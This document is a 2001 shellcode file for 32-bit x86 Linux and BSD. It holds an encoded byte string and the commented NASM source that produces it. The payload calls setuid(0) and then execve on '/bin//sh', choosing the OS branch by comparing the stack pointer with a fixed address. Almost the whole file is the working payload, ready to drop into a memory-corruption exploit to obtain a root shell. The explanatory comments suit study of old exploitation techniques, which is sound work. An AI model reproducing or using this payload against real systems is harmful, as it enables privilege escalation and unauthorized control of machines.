"\x31\xdb\xf7\xe3\xb0\x17\x50\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\xbe\xef\xbe\xff\xbf\x39\xf4\x7f\x07"
"\x52\x53\xb0\x3b\x50\xcd\x80\x53\x89\xe1\xb0\x0b\xcd\x80";

#Program: setuid, execve /bin/sh shellcode for Linux and *BSD
#Program by: lockdown	(www.lockeddown.net)
#date: July 27, 2001
#last updated: Nov 28, 2001
#canis (www.0xfee1dead.net) cleaned up and optimised this code greatly.
#The NASM-style (Intel syntax, 32-bit x86) source below was assembled to produce the byte string above.
#-----------------------------------------------------------------------
# main: 32-bit x86 payload, Intel operand order (op dst, src).
#
# What the instructions below do, in order:
#   1. zero eax, ebx and edx, then issue syscall 23 (setuid) via int 0x80
#   2. build the NUL-terminated string "/bin//sh" on the stack
#   3. compare esp with the constant 0xbfffbeef to pick a branch
#   4. issue execve via int 0x80: syscall 59 with the arguments on the
#      stack (branch commented "BSD"), or syscall 11 with the arguments
#      in ebx/ecx/edx (label "linux")
#
# Registers: ebx = 0, later pointer to the path string
#            edx = 0 throughout (source of NULL words / NUL terminator)
#            ecx = argv pointer (linux branch only)
#            esi = scratch for the stack-address comparison
#
# For analysts: in the encoded byte string at the top of the file the two
# string pushes appear as 68 2f 2f 73 68 ('//sh') and 68 2f 62 69 6e
# ('/bin'), and every system call as cd 80 (int 0x80).
#-----------------------------------------------------------------------
segment .text
	global main
main:   
        # ebx = 0; on Linux int 0x80 takes the first syscall argument in ebx.
        xor  ebx, ebx
        mul  ebx		# edx:eax = eax * ebx = 0, so eax, ebx and edx are all zero
	
	mov  al, 23		# eax = 23: setuid syscall number (only the low byte is written)
	# Extra word on the stack before the trap; presumably the slot that the
	# stack-argument (BSD) convention expects below its arguments - confirm.
	push eax
	int  0x80

	# Build "/bin//sh" followed by four zero bytes on the stack. The doubled
	# slash pads the path to eight bytes so it fits two dword pushes.
	push edx
        push dword '//sh'
        push dword '/bin'
        # ebx = address of the path string (first execve argument on Linux).
        mov  ebx, esp
        # NULL word: terminates the argv array built on the linux branch, and
        # is the third stacked argument word on the BSD branch.
        push edx

        # OS selection: signed comparison of the stack pointer against a fixed
        # address; esp > 0xbfffbeef takes the linux branch.
        # NOTE(review): presumably a heuristic based on where each OS placed the
        # 32-bit user stack at the time of writing - confirm; it is not an
        # explicit OS check.
        mov  esi, dword 0xbfffbeef
        cmp  esp, esi
        jg  short linux

        # BSD branch: stack becomes [slot][path][NULL][NULL] from the top down.
        push edx
        push ebx

        mov al, 59		# al = 59: execve syscall number on BSD
        push eax
        int  0x80

# Reached by the jg above, and also by fall-through if the int 0x80 just
# before this label returns.
linux:
        # argv = { path, NULL } on the stack; ecx points at it, edx (0) is envp.
        push ebx
        mov  ecx, esp
	mov  al, 11		# al = 11: execve syscall number on Linux
	int  0x80

